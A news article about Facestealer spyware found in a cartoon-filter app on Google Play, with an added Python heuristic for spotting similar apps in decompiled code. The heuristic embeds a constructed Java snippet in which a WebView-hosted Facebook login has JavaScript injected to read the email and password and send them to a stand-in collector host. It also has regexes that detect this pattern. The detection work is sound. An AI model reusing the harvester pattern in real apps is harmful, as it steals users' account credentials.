Cybersecurity firm Pradeo discovered a malicious app that was available on Google Play and had been installed more than 100,000 times.
The app, Craftsart Cartoon Photo Tools, claimed to convert photos into cartoons or painting-style images through filters.
It carried a piece of spyware known as Facestealer, which steals Facebook credentials; with those, the attackers gain full access to the victim's account and everything in it, including stored credit card details, conversations and search history.
Pradeo alerted the Google Play team, and the app was subsequently removed from the store.
Evading Google’s Security
The app is a copy of popular, legitimate photo-editing apps; the only difference is a small piece of injected malicious code, and that small footprint inside an otherwise benign code base is what lets it slip past the store's automated safeguards.
The app itself, however, did not work well enough to pass as genuine: users repeatedly gave it one-star ratings and left reviews warning that it was fake, barely functional, or did not work at all.
How It Worked
When the app is launched it opens a Facebook login page, and the user must log in before any feature of the app is available. Because the login happens inside the app rather than in the browser or the official Facebook app, the usual cues that would expose a fake (the address bar, the account picker) are absent.
Whatever username and password the user enters are transmitted automatically to a server controlled by the operators of the app.
The operators then use the stolen credentials to take over accounts in a number of ways, most commonly to commit financial fraud, push phishing links to the victim's contacts, and spread fake news.
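As an added example, not code from the article, from Pradeo, or from the app itself: a small static heuristic that an analyst could run over decompiled sources of a suspect APK to spot the pattern described above. It assumes the credentials are captured by loading the Facebook login page inside an app-controlled WebView and driving it with injected JavaScript that reads the form fields, then shipping them to a separate server; that mechanism is an assumption of this example, not something the article states. Both source snippets, the `collector.example` host and the indicator names are constructed for the example.

```python
import re
from dataclasses import dataclass, field

# Constructed sample of decompiled Android sources, written for this example.
# Neither snippet is code from the Craftsart app or from Pradeo's analysis.
BENIGN_PHOTO_APP = """
public class HelpActivity extends Activity {
    protected void onCreate(Bundle b) {
        WebView w = findViewById(R.id.help);
        w.loadUrl("https://example.com/help/filters");
    }
}
"""

CREDENTIAL_HARVESTER = """
public class LoginActivity extends Activity {
    private static final String COLLECTOR = "https://collector.example/upload";
    protected void onCreate(Bundle b) {
        WebView w = findViewById(R.id.login);
        w.getSettings().setJavaScriptEnabled(true);
        w.addJavascriptInterface(new Bridge(COLLECTOR), "Bridge");
        w.setWebViewClient(new WebViewClient() {
            public void onPageFinished(WebView v, String url) {
                v.evaluateJavascript(
                    "document.forms[0].onsubmit=function(){"
                    + "Bridge.send(document.getElementById('m_login_email').value,"
                    + "document.getElementById('m_login_password').value);}", null);
            }
        });
        w.loadUrl("https://m.facebook.com/login.php");
    }
}
"""

# Indicators: name -> regex. Each one alone is innocent (plenty of apps embed a
# WebView or call a backend); it is the combination that resembles a harvester.
INDICATORS = {
    "loads_facebook_login": re.compile(r"https?://(?:m\.|www\.)?facebook\.com/login"),
    "injects_javascript": re.compile(
        r"evaluateJavascript\s*\(|loadUrl\s*\(\s*\"javascript:|addJavascriptInterface\s*\("),
    "reads_login_fields": re.compile(
        r"getElementById\(\s*['\"][^'\"]*(?:email|pass)[^'\"]*['\"]\s*\)"),
}
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")


def is_facebook_host(host: str) -> bool:
    # Exact or sub-domain match only; "evilfacebook.com" must not pass.
    return host == "facebook.com" or host.endswith(".facebook.com")


@dataclass
class Report:
    hits: list = field(default_factory=list)           # indicator names that matched
    foreign_hosts: list = field(default_factory=list)  # endpoints that are not Facebook
    suspicious: bool = False


def scan_source(text: str) -> Report:
    """Score one decompiled source file for the Facestealer-style pattern."""
    r = Report()
    for name, rx in INDICATORS.items():
        if rx.search(text):
            r.hits.append(name)
    hosts = set(URL_HOST.findall(text))
    r.foreign_hosts = sorted(h for h in hosts if not is_facebook_host(h))
    if r.foreign_hosts:
        r.hits.append("contacts_non_facebook_host")
    # Required: the app itself hosts a Facebook login and drives it with JS.
    # Supporting: it reads the form fields or talks to some other server.
    required = {"loads_facebook_login", "injects_javascript"}
    supporting = {"reads_login_fields", "contacts_non_facebook_host"}
    r.suspicious = required <= set(r.hits) and bool(supporting & set(r.hits))
    return r


def scan_tree(sources: dict) -> list:
    """Return the paths of files flagged as suspicious, in sorted order."""
    return sorted(p for p, src in sources.items() if scan_source(src).suspicious)


if __name__ == "__main__":
    tree = {"HelpActivity.java": BENIGN_PHOTO_APP,
            "LoginActivity.java": CREDENTIAL_HARVESTER}
    for path, src in tree.items():
        rep = scan_source(src)
        print(f"{path}: suspicious={rep.suspicious} hits={rep.hits} hosts={rep.foreign_hosts}")
```

The benign snippet trips only the "talks to a non-Facebook host" indicator, which on its own is not a verdict; the harvester trips all four. In practice the sources would come from a decompiler run over the APK, and the regexes would be tuned against real samples rather than this constructed pair.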
Sinister Uses Of Data
Harvested Facebook accounts can also be sold on the dark web, often for large sums, and used to spread propaganda on behalf of whoever pays for them.
The app communicates with a domain registered in Russia that is also tied to several other malicious apps previously available on Google Play.
To keep a presence on the store after takedowns, the operators routinely repackage the same malicious code into new apps, and in some cases the repackaging is fully automated.
Advice To Users
Pradeo has advised users who have the app installed to delete it immediately and to change their Facebook password. Change the password from a device that does not have the app, review the active sessions in Facebook's security settings and log out any you do not recognise, and enable two-factor authentication so that a stolen password alone is no longer enough.
A full factory reset of the phone is also advisable if there is any doubt that the app was completely removed, and users should stay alert for malware and spyware hiding inside otherwise innocuous apps.